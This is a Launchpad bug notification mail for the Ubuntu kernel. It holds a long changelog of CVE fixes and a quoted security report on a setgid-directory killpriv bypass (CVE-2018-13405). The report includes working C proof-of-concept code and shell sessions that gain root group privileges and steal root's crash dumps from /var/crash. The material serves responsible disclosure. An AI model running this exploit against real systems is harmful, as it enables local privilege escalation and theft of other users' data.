[Kernel-packages] [Bug 1779923] Re: other users' coredumps can be read via setgid directory and killpriv bypass

[Launchpad Bug Tracker]

This bug was fixed in the package linux - 3.13.0-157.207

---------------
linux (3.13.0-157.207) trusty; urgency=medium

  * linux: 3.13.0-157.207 -proposed tracker (LP: #1787982)

  * CVE-2017-5715 (Spectre v2 retpoline)
    - SAUCE: Fix "x86/retpoline/entry: Convert entry assembler indirect jumps"

  * CVE-2017-2583
    - KVM: x86: fix emulation of "MOV SS, null selector"

  * CVE-2017-7518
    - KVM: x86: fix singlestepping over syscall

  * CVE-2017-18270
    - KEYS: prevent creating a different user's keyrings

  * Update to upstream's implementation of Spectre v1 mitigation (LP: #1774181)
    - Documentation: Document array_index_nospec
    - array_index_nospec: Sanitize speculative array de-references
    - x86: Implement array_index_mask_nospec
    - x86: Introduce barrier_nospec
    - x86/get_user: Use pointer masking to limit speculation
    - x86/syscall: Sanitize syscall table de-references under speculation
    - vfs, fdtable: Prevent bounds-check bypass via speculative execution
    - nl80211: Sanitize array index in parse_txq_params
    - x86/spectre: Report get_user mitigation for spectre_v1
    - x86/kvm: Update spectre-v1 mitigation
    - nospec: Allow index argument to have const-qualified type
    - nospec: Move array_index_nospec() parameter checking into separate macro
    - nospec: Kill array_index_nospec_mask_check()
    - SAUCE: Replace osb() calls with array_index_nospec()
    - SAUCE: Rename osb() to barrier_nospec()
    - SAUCE: x86: Use barrier_nospec in arch/x86/um/asm/barrier.h

  * Prevent speculation on user controlled pointer (LP: #1775137)
    - x86: reorganize SMAP handling in user space accesses
    - x86: fix SMAP in 32-bit environments
    - x86: Introduce __uaccess_begin_nospec() and uaccess_try_nospec
    - x86/usercopy: Replace open coded stac/clac with __uaccess_{begin, end}
    - x86/uaccess: Use __uaccess_begin_nospec() and uaccess_try_nospec

  * CVE-2016-10208
    - ext4: validate s_first_meta_bg at mount time
    - ext4: fix fencepost in s_first_meta_bg validation

  * CVE-2018-10323
    - xfs: set format back to extents if xfs_bmap_extents_to_btree

  * CVE-2017-16911
    - usbip: prevent vhci_hcd driver from leaking a socket pointer address

  * CVE-2018-13406
    - video: uvesafb: Fix integer overflow in allocation

  * CVE-2018-10877
    - ext4: verify the depth of extent tree in ext4_find_extent()

  * CVE-2018-10881
    - ext4: clear i_data in ext4_inode_info when removing inline data

  * CVE-2018-1092
    - ext4: fail ext4_iget for root directory if unallocated

  * CVE-2018-1093
    - ext4: fix block bitmap validation when bigalloc, ^flex_bg
    - ext4: add validity checks for bitmap block numbers

  * CVE-2018-12233
    - jfs: Fix inconsistency between memory allocation and ea_buf->max_size

  * CVE-2017-16912
    - usbip: fix stub_rx: get_pipe() to validate endpoint number

  * CVE-2018-10675
    - mm/mempolicy: fix use after free when calling get_mempolicy

  * CVE-2017-8831
    - saa7164: fix sparse warnings
    - saa7164: fix double fetch PCIe access condition

  * CVE-2017-16533
    - HID: usbhid: fix out-of-bounds bug

  * CVE-2017-16538
    - media: dvb-usb-v2: lmedm04: move ts2020 attach to dm04_lme2510_tuner
    - media: dvb-usb-v2: lmedm04: Improve logic checking of warm start

  * CVE-2017-16644
    - hdpvr: Remove deprecated create_singlethread_workqueue
    - media: hdpvr: Fix an error handling path in hdpvr_probe()

  * CVE-2017-16645
    - Input: ims-psu - check if CDC union descriptor is sane

  * CVE-2017-5549
    - USB: serial: kl5kusb105: fix line-state error handling

  * CVE-2017-16532
    - usb: usbtest: fix NULL pointer dereference

  * CVE-2017-16537
    - media: imon: Fix null-ptr-deref in imon_probe

  * CVE-2017-11472
    - ACPICA: Add additional debug info/statements
    - ACPICA: Namespace: fix operand cache leak

  * CVE-2017-16643
    - Input: gtco - fix potential out-of-bound access

  * CVE-2017-16531
    - USB: fix out-of-bounds in usb_set_configuration

  * CVE-2018-10124
    - kernel/signal.c: avoid undefined behaviour in kill_something_info

  * CVE-2017-6348
    - irda: Fix lockdep annotations in hashbin_delete().

  * CVE-2017-17558
    - USB: core: prevent malicious bNumInterfaces overflow

  * CVE-2017-5897
    - ip6_gre: fix ip6gre_err() invalid reads

  * CVE-2017-6345
    - SAUCE: import sock_efree()
    - net/llc: avoid BUG_ON() in skb_orphan()

  * CVE-2017-7645
    - nfsd: check for oversized NFSv2/v3 arguments

  * CVE-2017-9984
    - ALSA: msnd: Optimize / harden DSP and MIDI loops

  * CVE-2018-1000204
    - scsi: sg: allocate with __GFP_ZERO in sg_build_indirect()

  * CVE-2018-10021
    - scsi: libsas: defer ata device eh commands to libata

  * CVE-2017-16914
    - usbip: fix stub_send_ret_submit() vulnerability to null transfer_buffer

  * CVE-2017-16913
    - usbip: fix stub_rx: harden CMD_SUBMIT path to handle malicious input

  * CVE-2017-16535
    - USB: core: fix out-of-bounds access bug in usb_get_bos_descriptor()

  * CVE-2017-16536
    - cx231xx-cards: fix NULL-deref on missing association descriptor

  * CVE-2017-16650
    - net: qmi_wwan: fix divide by 0 on bad descriptors

  * CVE-2017-18255
    - perf/core: Fix the perf_cpu_time_max_percent check

  * CVE-2018-10940
    - cdrom: information leak in cdrom_ioctl_media_changed()

  * CVE-2018-13094
    - xfs: don't call xfs_da_shrink_inode with NULL bp

  * other users' coredumps can be read via setgid directory and killpriv bypass
    (LP: #1779923) // CVE-2018-13405
    - Fix up non-directory creation in SGID directories

  * CVE-2017-16529
    - ALSA: usb-audio: Check out-of-bounds access by corrupted buffer descriptor

  * CVE-2017-2671
    - ping: implement proper locking

  * CVE-2017-15649
    - packet: hold bind lock when rebinding to fanout hook
    - packet: in packet_do_bind, test fanout with bind_lock held

  * CVE-2017-16527
    - ALSA: usb-audio: Kill stray URB at exiting

  * CVE-2017-16526
    - uwb: properly check kthread_run return value

  * CVE-2017-11473
    - x86/acpi: Prevent out of bound access caused by broken ACPI tables

  * CVE-2017-14991
    - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE

  * CVE-2017-2584
    - KVM: x86: Introduce segmented_write_std

  * CVE-2018-10087
    - kernel/exit.c: avoid undefined behaviour when calling wait4()

  * fscache: Fix hanging wait on page discarded by writeback (LP: #1777029)
    - fscache: Fix hanging wait on page discarded by writeback

 -- Khalid Elmously <khalid.elmou...@canonical.com>  Mon, 20 Aug 2018
12:07:46 -0400

** Changed in: linux (Ubuntu Trusty)
       Status: Fix Committed => Fix Released

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2016-10208

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11472

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-11473

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14991

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-15649

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16526

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16527

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16529

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16531

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16532

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16533

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16535

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16536

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16537

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16538

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16643

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16644

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16645

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16650

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16911

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16912

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16913

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16914

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17558

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18255

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-18270

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2583

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2584

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2671

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5549

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5715

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5897

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6345

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-6348

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7518

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7645

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8831

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9984

** CVE added: https://cve.mitre.org/cgi-
bin/cvename.cgi?name=2018-1000204

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10021

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10087

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10124

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10675

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10877

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1092

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-1093

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10940

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1779923

Title:
  other users' coredumps can be read via setgid directory and killpriv
  bypass

Status in linux package in Ubuntu:
  In Progress
Status in linux source package in Trusty:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in linux source package in Bionic:
  Fix Released
Status in linux source package in Cosmic:
  In Progress

Bug description:
  Note: I am both sending this bug report to secur...@kernel.org and filing it 
in
  the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
  or as a Ubuntu bug. You may wish to talk to each other to determine the best
  place to fix this.

  I noticed halfdog's old writeup at
  https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
  , describing essentially the following behavior in combination with a
  trick for then writing to the resulting file without triggering the
  killpriv logic:

  
  =============
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat > demo.c
  #include <fcntl.h>
  int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
  user@debian:~/sgid_demo$ gcc -o demo demo.c
  user@debian:~/sgid_demo$ ./demo
  user@debian:~/sgid_demo$ ls -l dir/file
  -rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
  =============

  
  Two patches for this were proposed on LKML back then:
  "[PATCH 1/2] fs: Check f_cred instead of current's creds in
  should_remove_suid()"
  
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.l...@kernel.org/

  "[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid 
directory"
  
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.l...@kernel.org/

  However, as far as I can tell, neither of them actually landed.

  
  You can also bypass the killpriv logic with fallocate() and mmap() -
  fallocate() permits resizing the file without triggering killpriv,
  mmap() permits writing without triggering killpriv (the mmap part is mentioned
  at
  
https://lore.kernel.org/lkml/cagxu5jlu6ogkqugqrcoyq6dabowz9hx3fuq+-zc7njlukgk...@mail.gmail.com/
  ):

  
  =============
  user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
  user@debian:~/sgid_demo$ cat fallocate.c
  #define _GNU_SOURCE
  #include <stdlib.h>
  #include <fcntl.h>
  #include <err.h>
  #include <sys/mman.h>
  #include <sys/stat.h>
  #include <unistd.h>
  #include <string.h>

  int main(void) {
    int src_fd = open("/usr/bin/id", O_RDONLY);
    if (src_fd == -1)
      err(1, "open 2");
    struct stat src_stat;
    if (fstat(src_fd, &src_stat))
      err(1, "fstat");
    int src_len = src_stat.st_size;
    char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
    if (src_mapping == MAP_FAILED)
      err(1, "mmap 2");

    int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
    if (fd == -1)
      err(1, "open");
    if (fallocate(fd, 0, 0, src_len))
      err(1, "fallocate");
    char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 
0);
    if (mapping == MAP_FAILED)
      err(1, "mmap");

  
    memcpy(mapping, src_mapping, src_len);

    munmap(mapping, src_len);
    close(fd);
    close(src_fd);

    execl("./dir/file", "id", NULL);
    err(1, "execl");
  }
  user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
  user@debian:~/sgid_demo$ ./fallocate
  uid=1000(user) gid=1000(user) egid=0(root)
  
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
  =============

  
  sys_copy_file_range() also looks as if it bypasses killpriv on
  supported filesystems, but I haven't tested that one so far.

  On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
  contains group-readable crashdumps in some custom format, so you can use this
  issue to steal other users' crashdumps:

  
  =============
  user@ubuntu-18-04-vm:~$ ls -l /var/crash
  total 296
  -rw-r----- 1 user whoopsie  16527 Jun 25 22:27 
_usr_bin_apport-unpack.1000.crash
  -rw-r----- 1 root whoopsie  50706 Jun 25 21:51 _usr_bin_id.0.crash
  -rw-r----- 1 user whoopsie  51842 Jun 25 21:42 _usr_bin_id.1000.crash
  -rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
  -rw-r----- 1 root whoopsie  18765 Jun 26 00:42 _usr_bin_xattr.0.crash
  user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
  cat: /var/crash/_usr_bin_id.0.crash: Permission denied
  user@ubuntu-18-04-vm:~$ cat fallocate.c 
  #define _GNU_SOURCE
  #include <stdio.h>
  #include <stdlib.h>
  #include <fcntl.h>
  #include <err.h>
  #include <sys/mman.h>
  #include <sys/stat.h>
  #include <unistd.h>
  #include <string.h>

  int main(int argc, char **argv) {
    if (argc != 2) {
      printf("usage: ./fallocate <file_to_read>");
      return 1;
    }
    int src_fd = open("/bin/cat", O_RDONLY);
    if (src_fd == -1)
      err(1, "open 2");
    struct stat src_stat;
    if (fstat(src_fd, &src_stat))
      err(1, "fstat");
    int src_len = src_stat.st_size;
    char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
    if (src_mapping == MAP_FAILED)
      err(1, "mmap 2");

    unlink("/var/crash/privileged_cat"); /* in case we've already run before */
    int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755);
    if (fd == -1)
      err(1, "open");
    if (fallocate(fd, 0, 0, src_len))
      err(1, "fallocate");
    char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 
0);
    if (mapping == MAP_FAILED)
      err(1, "mmap");
    memcpy(mapping, src_mapping, src_len);
    munmap(mapping, src_len);
    close(fd);

    execl("/var/crash/privileged_cat", "cat", argv[1], NULL);
    err(1, "execl");
  }
  user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c
  user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > 
/var/crash/_usr_bin_id.0.crash.stolen
  user@ubuntu-18-04-vm:~$ ls -l /var/crash
  total 384
  -rwxr-sr-x 1 user whoopsie  35064 Jul  3 19:22 privileged_cat
  -rw-r----- 1 user whoopsie  16527 Jun 25 22:27 
_usr_bin_apport-unpack.1000.crash
  -rw-r----- 1 root whoopsie  50706 Jun 25 21:51 _usr_bin_id.0.crash
  -rw-r--r-- 1 user whoopsie  50706 Jul  3 19:22 _usr_bin_id.0.crash.stolen
  -rw-r----- 1 user whoopsie  51842 Jun 25 21:42 _usr_bin_id.1000.crash
  -rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
  -rw-r----- 1 root whoopsie  18765 Jun 26 00:42 _usr_bin_xattr.0.crash
  user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked
  user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack
  user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' 
/var/crash/_usr_bin_id.0.crash.stolen
  user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen 
root_crash_unpacked/
  user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump 
  root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 
(SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, 
effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64'
  =============

  
  This bug is subject to a 90 day disclosure deadline. After 90 days elapse
  or a patch has been made broadly available (whichever is earlier), the bug
  report will become visible to the public.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1779923/+subscriptions

-- 
Mailing list: https://launchpad.net/~kernel-packages
Post to     : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help   : https://help.launchpad.net/ListHelp